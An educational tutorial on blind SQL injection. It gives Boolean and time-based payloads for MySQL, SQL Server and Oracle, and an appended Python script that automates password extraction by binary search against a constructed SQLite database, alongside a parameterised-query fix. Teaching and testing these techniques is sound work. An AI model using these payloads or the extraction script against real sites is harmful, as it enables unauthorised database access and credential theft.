Injection attacks (Part 4)

BLIND SQL

In a blind SQL injection the attacker cannot see the query output directly. Instead the attacker asks the DB a series of yes/no questions, and the application's behaviour (a different page, or a delayed response) gives the answer. It is often claimed that hiding query results and error messages prevents database enumeration. That is a "MYTH", and we will be breaking it in this post.

The only disadvantage of this type of attack is that it is very slow: every bit of information costs at least one request. If you have a lot of patience (or a script), feel free to do it.

Blind SQL injection is further subcategorised into

  • Boolean based
  • Time based

In the Boolean-based technique the attacker forces a TRUE or FALSE condition into the query and checks how the application behaves in each case. If the two responses differ, the difference can be used to answer any question about the database.

In the time-based technique the attacker injects a query that delays execution only when a condition is true (or uses some other time-based approach), so the response time becomes the answer. This works even when the page looks identical for TRUE and FALSE.

We will discuss both of them below.


Boolean

We have a database with movie names stored in it; let's try to find a movie.

1) Searching for the movie "hero" gives a negative response.

See the response "Movie does not exist".

2) Searching for "iron man" gives a positive response.

The response has changed. Now we get started.

3) Let's play with the search string. The # comments out the rest of the query (MySQL syntax); the single quote closes the string the application built around our input.

iron man' AND 1=1#

Here we have forced a true condition. The movie exists and 1=1 is always true, so both sides of the AND are true and the DB returns a positive.

4) Now we have forced a false condition.

iron man' AND 1=2#

The movie exists but 1=2 is false, so the overall result is false and the DB returns a negative.

The two different responses confirm that the search is vulnerable to blind SQL injection.

< Now that we have confirmed this, let's play >

Version detection

1) Getting the version. We are checking whether the first character of the version string is 4.

iron man' AND substring(version(),1,1)=4#

2) Changing the argument 4 to 5, we get a positive response from the application, so the first character of the version is 5 (MySQL 5.x).

iron man' AND substring(version(),1,1)=5#

Note that version(), substring() and the # comment are MySQL syntax. On other databases the version function and the comment marker differ (for example @@version and -- on Microsoft SQL Server), so the first thing to establish is which database engine is behind the page.

Database enumeration

1) Playing with the input again, this time to learn the length of the current database's name.

iron man' AND length(database())=1#

2) Increase the number one at a time. The application returns a true (positive) response when the length is 5.

iron man' AND length(database())=5#

Getting the DB name

Now we know that the length of the DB name is 5, so the DB name is _ _ _ _ _. Which characters?

1) Getting the first character

iron man' AND substring(database(),1,1)='a'#

If the application returns a positive response we can conclude that the first character of the DB name is 'a'.

We have to repeat this for every candidate character (letters, digits and underscore are all legal in a MySQL database name) until a match is found. Two practical notes: MySQL's default collations are case-insensitive, so 'a' and 'A' both match; compare ascii(substring(database(),1,1)) to a number, or use BINARY, to tell them apart. And comparing with > instead of = lets you binary-search the character code, which cuts the cost from dozens of requests per character to about seven.

2) Getting the second character, by moving the start position of substring() to 2

iron man' AND substring(database(),2,1)='a'#

It is a time-consuming approach, but the results are mostly accurate.


Time based

1) Microsoft SQL Server has a built-in statement for delaying a query: WAITFOR DELAY 'hours:min:sec'. The following makes the server pause for 2 seconds before it continues, so the response arrives 2 seconds late.

http://www.test.com/test.aspx?id=25;waitfor delay '0:0:2'; --

This relies on stacked queries (the ; ends the original statement and starts ours), which SQL Server allows.

2) MySQL 5.0.12 and later have SLEEP(seconds). On older versions, or where SLEEP() is blocked, the alternative is to use a function that takes a long time to run: BENCHMARK.

This function evaluates an expression the specified number of times.

BENCHMARK(1000000,ENCODE('hi','Bye'));

ENCODE() was removed in MySQL 8.0; any cheap-but-not-free expression such as MD5('x') works instead. Because BENCHMARK is CPU-bound, the delay it produces depends on server load, so calibrate the iteration count against a known-true condition before trusting a measurement.

3) Oracle PL/SQL has DBMS_LOCK.SLEEP(seconds);

This suspends the session for the specified number of seconds. But wait, there are a few restrictions. Oracle does not support stacked queries, and DBMS_LOCK.SLEEP is a procedure rather than a function, so it cannot be injected into a SELECT or a subquery; it only runs inside a PL/SQL block. Another one is that EXECUTE on DBMS_LOCK is not granted to ordinary users by default.
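As an added example (this is not code from the original post), here is the whole Boolean procedure above, from the 1=1/1=2 check through length() and character-by-character extraction, together with the time-based variant, automated in Python against a constructed SQLite database that stands in for the movie site. SQLite is used so it runs offline, which changes a few details from the MySQL payloads on the page: comments end with -- instead of #, unicode() and substr() replace ascii() and substring(), there is no database() so the value read blind is a password fetched through a subquery, and sleep() is a user function registered on the connection to mimic MySQL's SLEEP(). The table and column names, the secret value and the vulnerable search handler are all constructed for the example. It also goes beyond the page in one way: characters are recovered by binary search on their code point rather than by trying 'a', 'b', 'c' in turn.

```python
import sqlite3
import time

# Constructed stand-in for the movie site: the movie names plus a secret to read blind.
# Hypothetical table/column names and values; nothing here comes from the original post.
SECRET = "(SELECT password FROM users WHERE username='admin')"


def build_db():
    con = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the time-based variant can run offline.
    con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    con.execute("CREATE TABLE movies(name TEXT)")
    con.executemany("INSERT INTO movies VALUES (?)", [("iron man",), ("batman",)])
    con.execute("CREATE TABLE users(username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return con


def search_vulnerable(con, term):
    """Hypothetical vulnerable handler: the search term is concatenated into the SQL.
    True stands for the movie page, False for "Movie does not exist"."""
    sql = "SELECT name FROM movies WHERE name = '" + term + "'"
    return con.execute(sql).fetchone() is not None


def search_fixed(con, term):
    """Same search with a bound parameter: the term can no longer change the query."""
    return con.execute("SELECT name FROM movies WHERE name = ?", (term,)).fetchone() is not None


class BooleanOracle:
    """Asks a yes/no question and reads the answer from the positive/negative page."""

    def __init__(self, search):
        self.search, self.requests = search, 0

    def ask(self, condition):
        self.requests += 1
        # SQLite comments with --, where the page's MySQL payloads use #
        return self.search("iron man' AND (" + condition + ") -- ")


class TimeOracle:
    """Asks the same question but reads the answer from the response time."""

    def __init__(self, search, delay=0.1):
        self.search, self.delay, self.requests = search, delay, 0

    def ask(self, condition):
        self.requests += 1
        # The delay only fires when the condition is true; the row still matches either way.
        payload = (f"iron man' AND (CASE WHEN ({condition}) THEN sleep({self.delay}) "
                   f"ELSE 0 END) = 0 -- ")
        start = time.monotonic()
        self.search(payload)
        # Threshold at half the injected delay. Against a real target, measure a baseline
        # first and repeat borderline answers: network jitter produces false positives.
        return time.monotonic() - start > self.delay / 2


def extract_length(oracle, expr, max_len=64):
    """Step 'length(database())=N' from the page, counting up until the oracle says yes."""
    for n in range(max_len + 1):
        if oracle.ask(f"length({expr}) = {n}"):
            return n
    return None  # never answered yes: not injectable, or the value is longer than max_len


def extract_string(oracle, expr):
    """Recover expr one character at a time. Comparing code points with > allows a binary
    search: 7 requests per character for ASCII instead of one per candidate letter."""
    length = extract_length(oracle, expr)
    if length is None:
        return None
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite's unicode()/substr() correspond to MySQL's ascii()/substring()
            if oracle.ask(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    con = build_db()
    b = BooleanOracle(lambda term: search_vulnerable(con, term))
    print("boolean:", extract_string(b, SECRET), "in", b.requests, "requests")
    t = TimeOracle(lambda term: search_vulnerable(con, term))
    print("time-based:", extract_string(t, SECRET), "in", t.requests, "requests")
    f = BooleanOracle(lambda term: search_fixed(con, term))
    print("parameterised query:", extract_string(f, SECRET))
```

Both oracles recover the 7-character secret in 8 requests for the length plus 49 for the characters; the page's one-letter-at-a-time approach would need up to 95 requests per character for printable ASCII. The parameterised handler never answers yes, so extraction stops at the length probe, which is the fix the whole post is arguing for.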
